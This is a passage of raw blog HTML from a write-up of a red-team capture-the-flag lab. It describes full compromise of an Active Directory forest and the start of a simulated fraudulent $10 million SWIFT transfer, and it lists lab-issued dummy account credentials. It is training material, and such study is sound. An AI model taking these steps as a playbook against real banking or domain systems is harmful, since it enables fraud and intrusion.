data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210181620\" data-image-description=\"\" 
data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181620.png?fit=1024%2C546&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181620.png?resize=1024%2C546&#038;ssl=1\" alt=\"\" class=\"wp-image-524\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181620.png?resize=1024%2C546&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181620.png?resize=300%2C160&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181620.png?resize=768%2C409&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181620.png?w=1317&amp;ssl=1 1317w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div 
style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"33-compromising-bankdc-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Compromising BANKDC<\/mark><\/h2>\n\n\n\n<p>We should be able to connect to BANKDC now and submit the proof of compromise.<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911df8b&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911df8b\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"545\" data-attachment-id=\"525\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210181829\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181829.png?fit=1393%2C742&amp;ssl=1\" data-orig-size=\"1393,742\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210181829\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181829.png?fit=1024%2C545&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" 
data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181829.png?resize=1024%2C545&#038;ssl=1\" alt=\"\" class=\"wp-image-525\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181829.png?resize=1024%2C545&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181829.png?resize=300%2C160&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181829.png?resize=768%2C409&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181829.png?w=1393&amp;ssl=1 1393w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911e40a&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911e40a\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" 
height=\"612\" data-attachment-id=\"527\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210201339\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210201339.png?fit=1256%2C751&amp;ssl=1\" data-orig-size=\"1256,751\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210201339\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210201339.png?fit=1024%2C612&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210201339.png?resize=1024%2C612&#038;ssl=1\" alt=\"\" class=\"wp-image-527\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210201339.png?resize=1024%2C612&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210201339.png?resize=300%2C179&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210201339.png?resize=768%2C459&amp;ssl=1 768w, 
https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210201339.png?w=1256&amp;ssl=1 1256w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>At this point, we have compromised all three domains. We have the highest privileges in the domain and we own all the Domain Controllers, users, and computers for the entire AD Forest. This is a huge achievement for a Red Teamer.<\/p>\n\n\n\n<p>The goal of this challenge is to show the impact of the compromise. 
Our final goal is to make a fraudulent transaction and compromise the SWIFT banking system.<\/p>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"34-compromising-swift-banking-system-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Compromising SWIFT Banking System<\/mark><\/h2>\n\n\n\n<p>Accessing the application from the <strong>JMP <\/strong>machine shows us the following web page.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911e9d8&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911e9d8\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"648\" data-attachment-id=\"528\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210193256\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210193256.png?fit=1221%2C773&amp;ssl=1\" data-orig-size=\"1221,773\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210193256\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210193256.png?fit=1024%2C648&amp;ssl=1\" 
data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210193256.png?resize=1024%2C648&#038;ssl=1\" alt=\"\" class=\"wp-image-528\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210193256.png?resize=1024%2C648&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210193256.png?resize=300%2C190&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210193256.png?resize=768%2C486&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210193256.png?w=1221&amp;ssl=1 1221w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>To get instructions on how to proceed, we can go to the e-citizen platform and select option 17 as 
we are supposed to when submitting the proof of compromise. We get the instructions below.<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#282A36\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"In order to proof that you have access to the SWIFT system, dummy accounts have been created for you and you will have to perform the following steps to prove access.\n===============================================\nAccount Details:\nSource Email:\t\tishsome36@source.loc\nSource Password:\tT9nscPQYAnD-Jw\nSource AccountID:\t65c82460599a22214d185b31\nSource Funds:\t\t$ 10 000 000\n\nDestination Email:\tishsome36@destination.loc\nDestination Password:\tpKLuBT5vhbh7-w\nDestination AccountID:\t65c82463599a22214d185b32\nDestination Funds:\t$ 10\n===============================================\n\nUsing these details, perform the following steps:\n1. Go to the SWIFT web application\n2. Navigate to the Make a Transaction page\n3. Issue a transfer using the Source account as Sender and the Destination account as Receiver. 
You will have to use the corresponding account IDs.\n4. Issue the transfer for the full 10 million dollars\n5. Once completed, request verification of your transaction here (No need to check your email once the transfer has been created).\" style=\"color:#F8F8F2;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki dracula\" style=\"background-color: #282A36\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #50FA7B\">In<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">order<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">to<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">proof<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">that<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">you<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">have<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">access<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">to<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">the<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">SWIFT<\/span><span style=\"color: #F8F8F2\"> <\/span><span 
style=\"color: #F1FA8C\">system,<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">dummy<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">accounts<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">have<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">been<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">created<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">for<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">you<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">and<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">you<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">will<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">have<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">to<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">perform<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">the<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">following<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">steps<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">to<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">prove<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">access.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">===============================================<\/span><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">Account<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Details:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">Source<\/span><span 
style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Email:<\/span><span style=\"color: #F8F8F2\">\t\t<\/span><span style=\"color: #F1FA8C\">ishsome36@source.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">Source<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Password:<\/span><span style=\"color: #F8F8F2\">\t<\/span><span style=\"color: #F1FA8C\">T9nscPQYAnD-Jw<\/span><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">Source<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">AccountID:<\/span><span style=\"color: #F8F8F2\">\t<\/span><span style=\"color: #BD93F9\">65<\/span><span style=\"color: #F1FA8C\">c82460599a22214d185b31<\/span><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">Source<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Funds:<\/span><span style=\"color: #F8F8F2\">\t\t$ <\/span><span style=\"color: #BD93F9\">10<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #BD93F9\">000<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #BD93F9\">000<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">Destination<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Email:<\/span><span style=\"color: #F8F8F2\">\t<\/span><span style=\"color: #F1FA8C\">ishsome36@destination.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">Destination<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Password:<\/span><span style=\"color: #F8F8F2\">\t<\/span><span style=\"color: #F1FA8C\">pKLuBT5vhbh7-w<\/span><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">Destination<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">AccountID:<\/span><span style=\"color: #F8F8F2\">\t<\/span><span style=\"color: #BD93F9\">65<\/span><span style=\"color: 
#F1FA8C\">c82463599a22214d185b32<\/span><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">Destination<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Funds:<\/span><span style=\"color: #F8F8F2\">\t$ <\/span><span style=\"color: #BD93F9\">10<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">===============================================<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">Using<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">these<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">details,<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">perform<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">the<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">following<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">steps:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">1.<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Go<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">to<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">the<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">SWIFT<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">web<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">application<\/span><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">2.<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Navigate<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">to<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">the<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: 
#F1FA8C\">Make<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">a<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Transaction<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">page<\/span><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">3.<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Issue<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">a<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">transfer<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">using<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">the<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Source<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">account<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">as<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Sender<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">and<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">the<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Destination<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">account<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">as<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Receiver.<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">You<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">will<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">have<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">to<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: 
#F1FA8C\">use<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">the<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">corresponding<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">account<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">IDs.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">4.<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Issue<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">the<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">transfer<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">for<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">the<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">full<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #BD93F9\">10<\/span><span style=\"color: 